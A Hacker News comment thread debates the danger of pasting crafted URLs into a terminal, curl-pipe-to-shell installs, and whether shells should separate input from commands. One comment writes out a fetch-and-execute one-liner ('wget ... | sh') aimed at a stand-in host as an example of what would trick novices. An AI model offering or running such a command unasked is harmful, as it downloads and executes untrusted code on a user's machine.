Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Clever, but I really hope nobody is going to blindly copy-paste-go! a URL like that. Especially if you're technical enough to use a terminal, you should know better.


I'm pretty sure even the most tech-savvy users make this mistake from time to time. I certainly do.

This happens often enough, there's an entry in youtube-dl FAQ about it:

https://github.com/ytdl-org/youtube-dl#video-url-contains-an...

(They advice to add single quotes around the URL, which as you now know, is not necessarily sufficient.)


Lots of legit projects encourage this practice. Especially with quotes, it's a reasonable expectation that you're getting a literal. Conversely, it's unreasonable to expect that everyone can parse shell escape strings in their brains.

Now this example wasn't exactly well camouflaged, but I'd not be surprised if you can make it much more innocent looking.


I mean, it like dodgy to any user familiar with URLs surely?

Wouldn't

    wget -qO - www.example.com/script | sh
catch far more of the uninitiated?


People go nuts about curl | bash but then grab random packages off pip/gem/npm/brew/VimPlug/packages.el/VS Code without so much as a second look and they can all run arbitrary code too.


If you curl | bash from http, you may get MITM'd because you're not checking the checksum. Most modern package managers at least check that what was downloaded is indeed what the original developer intended, so it's slightly better.


How is it possible to be so wrong on so many levels in just two sentences?

1. Your epistemic reasoning capabilities are broken (as in, why do you think people should know better?)

2. You are just adopting an ad-hoc philosophy based on how shells work. If interactive languages had separate text inputs instead of just parsing a stream of text from stdin, pasting would always be safe. One may be tempted to call this "UN*X braindamage".

3. You appear to possibly believe in checking a URL before opening it type voodoo as well, regardless of shell issues


If a carpenter chops his fingers off, it's not the fault of the saw. People who use programs should be expected to know what's safe to put in and out. Having a base level expectation of competence for operators is normal.

A separate text input is just stdin by another name.

Yes, I believe people who paste URLs into the terminal should examine those URLs - you generally have to trim some stuff, quote, or rewrite things to make them useful. If you believe in wildly flinging data everywhere, good on you, I'd rather deal with easily avoidable problems such as demonstrated in TFA.


> last paragraph

You can't safely paste anything into the shell ever lol. For multiple reasons. It doesn't matter how much visual inspection you do.


> If a carpenter chops his fingers off, it's not the fault of the saw.

That would be an effective argument, but this vile shit has existed for decades without being fixed, for no good reason. This saw is specifically designed to slice fingers off, rather than do useful work, for no reason.

> Having a base level expectation of competence for operators is normal.

UNIX expects perfection, while providing none of its own.

> A separate text input is just stdin by another name.

No, nitwit, it prevents in-band signalling, which is the entire problem here.

Anyway, I use Emacs for everything, and don't have these issues. With wget, I use -i - to enter multiple URLs at once, but it would also defeat this.


Thanks for saving me a reply lol




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: